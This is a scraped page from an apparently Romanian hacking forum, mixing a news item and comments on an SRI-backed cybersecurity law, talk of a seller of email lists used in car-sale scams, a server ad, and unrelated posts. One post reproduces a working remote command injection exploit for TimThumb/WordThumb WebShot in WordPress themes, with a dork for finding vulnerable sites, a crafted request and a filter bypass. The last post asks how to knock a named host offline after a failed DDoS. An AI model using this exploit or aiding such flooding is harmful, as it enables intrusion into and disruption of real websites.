Leaderboard

Totul la 9,99 Lei - In limita stoc magazin Poate aveti nevoie de un stick de un card ceva

Generalul SRI Dumitru Dumbrav? a explicat, miercuri, la Comisia pentru Tehnologia Informa?iilor ?i Comunica?iilor, cum vede Serviciul Român de Informa?ii reglementarea Internetului în România. Potrivit apador.org, Dumbrav? sus?ine c? ritmul cu care se dezvolt? amenin??rile cibernetice este prea rapid, iar dezbaterea îndelungat? a Legii privind securitatea cibernetic? afecteaz? grav securitatea României. „În fiecare secund? sunt 8 noi utilizatori ai Internetului ?i 18 victime ale diverselor fraude pe Internet. În 24 de ore se scriu 250.000 de coduri mali?ioase. Un troian poate s? infecteze în zilele noastre 1,2 miliarde de PC-uri. Noi putem s? avem r?bdare, dar realitatea obiectiv? ?i virtual? nu are r?bdare cu noi. Câte victime au fost în cele dou? s?pt?mâni de secunde de când discut?m noi aceast? lege?”, a declarat acesta. Potrivit proiectului de lege privind securitatea cibernetic?, perchezi?ia informatic? se poate efectua chiar dac? persoana vizat? nu a comis nicio fapt? penal? sau infrac?iune ?i f?r? s? mai fie nevoie de autoriza?ia unui judec?tor. Generalul SRI spune c? este normal ca serviciile s? poat? avea acces oricând la datele de logare dintr-un computer infectat, care poate e folosit în criminalitatea cibernetic? f?r? ca utilizatorul lui s? ?tie (din cauza unui virus). Dumbrav? consider? c?, dimpotriv?, apelul la decizia unui judec?tor nu este esen?ital, cât? vreme „dac? mergi cu computerul la depanat nu treci mai întâi pe la judec?tor ca s?-i ceri avizul ca depanatorul s? se uite în computerul t?u”. Replica la aceast? declara?ie a venit de la deputatul PP-DD Vasile Oajdea care a zis c? acesta este ”un fel de viol”. ”Când omul merge la depanator o face pe riscul s?u. E dreptul fiec?ruia s? fac? ce vrea cu computerul personal, e altceva când î?i intr? cineva cu for?a în el. Ce propune?i dumneavoastr? este un fel de viol. De ce nu merge?i acum pe strad? ca s? întreba?i o domni?oar? dac? e de acord s?-i face?i un control?”, a replicat Oajdea. Într-o încercare de a-i convinge pe restul membrilor Comisiei, Dumbrav? a asemuit internau?ii cu ?oferii, computerele cu ma?inile ?i Internetul cu autostr?zile. ”S? ne imagin?m c? Internetul e ca un sistem de drumuri pe care circul? ?i ma?ini ale statului – pompieri, armat?, poli?ie – dar ?i ma?ini ale priva?ilor. Ce ar însemna ca codul rutier s? fie opozabil doar institu?iilor statului, pentru c? privatul ?i-a cump?rat ma?ina din banii lui ?i poate oricând intra în ma?ina pompierilor sau ambulan?ei? Sigur c? priva?ii nu au acelea?i obliga?ii ca institu?iile statului, dar intrând pe drumurile publice, pe Internet, ai o minim? obliga?ie. S? protej?m pân? la urm? Internetul ?sta care e al tuturor, nu al statului român. (…) Nu v?d nimic r?u în a pune pu?in? regul? într-un domeniu care acum e oarecum anarhic, adic? circul?m ca la începutul secolului cu tr?suri cu cai. Acum circul?m sigur, dar repet, pentru c? ma?inile noastre au obliga?ia la doi ani s?-?i fac? ITP-ul, s? facem revizia, m? deranjeaz?, c? m? cost? bani, dar atâta timp cât asta înseamn? siguran??… îmi înmatriculez ma?ina, c? a?a e frumos, s? se ?tie cine e în spatele volanului…”, a declarat acesta. Deputatul PNL Daniel Iane i-a atras aten?ia generalului SRI c? „Internetul a fost o inven?ie a civililor. Nu e ARPANET re?eaua militar? creat? de DARPA, predecesoarea Internetului", drumurile nu sunt ale armatei, sunt ale civililor. Armata a intrat pe drumurile noastre, asta e diferen?a. Eu v? în?eleg unde bate?i ?i v-am spus c? sunt un adept al acestor reglement?ri în ceea ce prive?te, nu Internetul, atât cât modul cum este el folosit, atât de c?tre noi civilii cât ?i de institu?iile statului”, a conchis acesta. SURSA

Aici nu se pun astfel de intrebari. Cauta in alta parte

exploit : http://www.exploit-db.com/exploits/33851/ news : Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk - The Hacker News Dork : inurl:"/themify/" intitle:"index of /" ###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day) # Affected website : a lot Wordpress Themes, Plugins, 3rd party components # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : June 24, 2014 # # Special Thanks to 2600 Thailand group # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ TimThumb is a small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications. Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes. http://www.binarymoon.co.uk/projects/timthumb/ https://code.google.com/p/timthumb/ The original project WordThumb 1.07 also vulnerable ( https://code.google.com/p/wordthumb/) They both shared exactly the same WebShot code! And there are several projects that shipped with "timthumb.php", such as, Wordpress Gallery Plugin https://wordpress.org/plugins/wordpress-gallery-plugin/ IGIT Posts Slider Widget http://wordpress.org/plugins/igit-posts-slider-widget/ All themes from http://themify.me/ contains vulnerable "wordthumb" in "<theme-name>/themify/img.php". [+] Exploit ============================================================ http:// <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http:// <wp-website>$(<os-cmds>) ** Note that OS commands payload MUST be within following character sets: [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=] ** Spaces, Pipe, GT sign are not allowed. ** This WebShot feature is DISABLED by default. ** CutyCapt and XVFB must be installed in constants. [+] Proof-of-Concept ============================================================ There are couple techniques that can be used to bypass limited charsets but I will use a shell variable $IFS insteads of space in this scenario. PoC Environment: Ubuntu 14.04 LTS PHP 5.5.9 Wordpress 3.9.1 Themify Parallax Theme 1.5.2 WordThumb 1.07 Crafted Exploit: http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat) GET /wp-content/themes/parallax/themify/img.php?webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1 Host: longcatlab.local Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685 HTTP/1.1 400 Bad Request Date: Tue, 24 Jun 2014 07:20:48 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 3059 Connection: close Content-Type: text/html … <a href='http://www.php.net/function.getimagesize' target='_new'>getimagesize</a> ( )</td><td title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr> </table></font> <h1>A WordThumb error has occured</h1>The following error(s) occured:<br /><ul><li>The image being resized is not a valid gif, jpg or png.</li></ul><br /><br />Query String : webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version : 1.07</pre> Even it response with error messages but injected OS command has already been executed. $ ls /tmp/longcat -lha - -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat [+] Vulnerability Analysis ============================================================ https://timthumb.googlecode.com/svn/trunk/timthumb.php Filename: timthumb.php if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt'); if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); ... timthumb::start(); ? start script ... public static function start(){ $tim = new timthumb(); ? create timthumb object, call __construct() ... $tim->run(); ... public function __construct(){ ... $this->src = $this->param('src'); ? set "src" variable to HTTP GET "src" parameter … if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ ... $this->isURL = true; ? prefix http/s result in isURL = true } ... protected function param($property, $default = ''){ if (isset ($_GET[$property])) { return $_GET[$property]; ... public function run(){ if($this->isURL){ ... if($this->param('webshot')){ ? HTTP GET "webshot" must submitted if(WEBSHOT_ENABLED){ ? this pre-defined constant must be true ... $this->serveWebshot(); ? call webshot feature } else { ... protected function serveWebshot(){ ... if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycapt return $this->error("CutyCapt is not installed. $instr"); } if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfb return $this->Error("Xvfb is not installed. $instr"); } ... $url = $this->src; if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check valid URL #LoL return $this->error("Invalid URL supplied."); } $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); ? check valid URL as specified in RFC 3986 http://www.ietf.org/rfc/rfc3986.txt ... if(WEBSHOT_XVFB_RUNNING){ putenv('DISPLAY=:100.0'); $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ? OS shell command injection } else { $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ? OS shell command injection } ... $out = `$command`; ? execute $command as shell command "PHP supports one execution operator: backticks (``). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - http://www.php.net//manual/en/language.operators.execution.php "$url" is failed to escape "$()" in "$command" which is result in arbitrary code execution. Jabber : Sniffer@jabber.ru Skype : Ali_Sniffer

Au luat romanii fomisti ca sa le vanda. O tara de bisnitari.

Daca vrei sa fii om cat de cat calumea, trimiti frumos banii inapoi, si datele pe care le ai despre acest individ le trimiti celor de la Craig si cu asta ai rezolvat problema, tu iesi cinstit, ai facut ceva care sa il opreasca sa faca ceea ce face(atat cat iti sta tie in putere) si cu asta basta. De ce sa risti ca si tu sa ai belele? E mai bine sa fii atat cu constiinta cat si cu reputatia curata. Crezi ca daca el da tepe de genul asta, o sa il opreasca sa faca ce face daca ii dai tu teapa cu cati ti-a platit pentru acele mail-uri? Din moment ce Stfean/vladimir si-a spus punctul de vedere, nu vad rostul ca acest topic sa fie lasat deschis intrucat nu genereaza decat spam. TC Daca mai ai ceva de adaugat vladimir, iei legatura cu unul din moderatori, sau cu mine si il redeschid. Pana atunci ramane asa. Le: Daca vrei sa ii donezi la o casa de copiii, fie alege una din zona ta, fie ai alternativa de a ii trimite catre o fundatie ce ajuta copiii cu probleme(materiale/sociale/de sanatate).

Tu oferi doar backlink-uri, nu promite oamenilor pagina intai si etc. Spune doar ca oferi backlink-uri si asta-i tot.

Banii i-am stricat , dar daca e nevoie pot pune de la economiile mele . Insa eu ii dau banii inapoi el isi mai cumpara 3 runzi de mailuri din alta parte si continua sa vanda masini fictive de cate 5k$ bucata si sa goleasca economiile de o viata a unor oameni .

E doar un server ramas: Xeon 3065 @ 2.33 GHz 2 Core, 4MB L2 Cache 2 x 160 GB SATA2, Raid 1 Mirror Memory: 8 GB Monthly traffic: 20 TB Network Port Speed: 100Mbps 1 IP Address Monthly cost: 35 euro Setup fee: 10 euro Nota: Activare in doua ore.

Vreau sa fac si eu un comentariu pe baza acestei stiri. În fiecare secund? sunt 8 noi utilizatori ai Internetului ?i 18 victime ale diverselor fraude pe Internet. În 24 de ore se scriu 250.000 de coduri mali?ioase. Un troian poate s? infecteze în zilele noastre 1,2 miliard 1) Daca in fiecare secunda sunt 8 utilizatori noi, iar 18 utilizatori sunt afectati atunci ar trebui ca fiecare utilizator de internet sa aiba cate 2 calculatoare in casa? 2) Se scriu in 24 ore 250.000 coduri malitioase? Si cate din ele sunt puse in practica, daca ar fi 250.000 de coduri malitioase / zi, inseamna ca pe decursul a 10 luni fiecare cetatean al Romaniei scrie cate un virus?'ai dracu de buni sunt aia de la antivirusi' 3) Legea aceasta este aplicata la noi in Romania, de cand Romania are 1,2 miliarde de utilizatori a internetului? Sau au vorbit la general doar ca sa unfle cifrele si sa spuna omul de rand "oau, ce se intampla in Romania" Potrivit proiectului de lege privind securitatea cibernetic?, perchezi?ia informatic? se poate efectua chiar dac? persoana vizat? nu a comis nicio fapt? penal? sau infrac?iune ?i f?r? s? mai fie nevoie de autoriza?ia unui judec?tor In cazul acesta domnii de la S.R.I au voie sa intre la tine in calculator ca sa afle informatii de genul "ce faci astazi, cu cine vorbesti, ce parola folosesti la facebook, datele de la carduri, datele de la proiectele tale pe internet" Nu hackerii sunt cei vanati, ci manipularea maselor, este ceva ce te loveste in ochi intr-o secunda, dupa primele randuri citite din acest articol. dac? mergi cu computerul la depanat nu treci mai întâi pe la judec?tor ca s?-i ceri avizul ca depanatorul s? se uite în computerul t?u”. Replica la aceast? declara?ie a venit de la deputatul PP-DD Vasile Oajdea care a zis c? acesta este ”un fel de viol” Ca sa dovedesc cat de batuti in cap sunt, haideti sa va dau eu raspunsul la urmatoarea afirmatie! Cand te duci cu calculatorulul la depanator, te duci deoarece calculatorul are o problema si nu mai functioneaza, la depanator te duci doar atunci cand ai nevoie, depanatorul utilizeaza calculatorul doar cu acordul tau, dar ceea ce fac domnii acestea la cravata, te obliga sa aiba acces in calculatorul tau? Macar daca l-ar repara ei gratuit cand oi avea nevoie! Acum ce a mai ramas, sa dea o lege de genul "Orice politist are voie sa intre peste tine in casa si sa io traga lu nevasta-ta" S? ne imagin?m c? Internetul e ca un sistem de drumuri pe care circul? ?i ma?ini ale statului – pompieri, armat?, poli?ie – dar ?i ma?ini ale priva?ilor. Ce ar însemna ca codul rutier s? fie opozabil doar institu?iilor statului, pentru c? privatul ?i-a cump?rat ma?ina din banii lui ?i poate oricând intra în ma?ina pompierilor sau ambulan?ei? Sigur c? priva?ii nu au acelea?i obliga?ii ca institu?iile statului, dar intrând pe drumurile publice, pe Internet, ai o minim? obliga?ie. S? protej?m pân? la urm? Internetul ?sta care e al tuturor, nu al statului român Asta este oficial cel mai prost exemplu care l-am putut citi in decursul vietii mele, drumurile publice sunt drumuri publice si asa se si numesc "Drumuri Publice", prin exemplu acesta si-au cam dat cu stangul in dreptul haide-ti sa va fac sa si intelegeti. In realitate pe autostrada merg masinile privatilor, cat si masinile statului, din cand in cand se mai provoaca un accident, dar accidentul acela nu este facut deoarece asa a vrut conducatorul masinei vinovate, ci deoarece nu sau respectat regulile de circulatie, si ideia sta in felul urmator: In exemplul lui se intelege ca pe "Drumurile Publice" trebuie sa circuli de fiecare data cu un agent de la politia rutiera langa tine, ca sa nu faci accidente, ei cred ca "penibilitatea" asta de lege o sa se accepte? Si chiar daca s-ar accepta tot ei vor avea de suferit, ce este scris in articolele lor este mai "negru" decat zilele acelea cu "A.C.T.A" Deputatul PNL Daniel Iane i-a atras aten?ia generalului SRI c? „[COLOR="#FF0000"]Internetul a fost o inven?ie a civililor[/COLOR]. Nu e ARPANET re?eaua militar? creat? de DARPA, predecesoarea Internetului", [B]drumurile nu sunt ale armatei, sunt ale civililor[/B]. Armata a intrat pe drumurile noastre, asta e diferen?a. Eu v? în?eleg unde bate?i ?i v-am spus c? sunt un adept al acestor reglement?ri în ceea ce prive?te, nu Internetul, atât cât modul cum este el folosit, atât de c?tre noi civilii cât ?i de institu?iile statului”, a conchis acesta.

Vreau sa il tin in flood pe un tip care are site-ul gazduit de btstelecom.ro si nu il pot pica, am incercat cu anonymous ddos si nu am reusit . Cu ce il pot da jos ?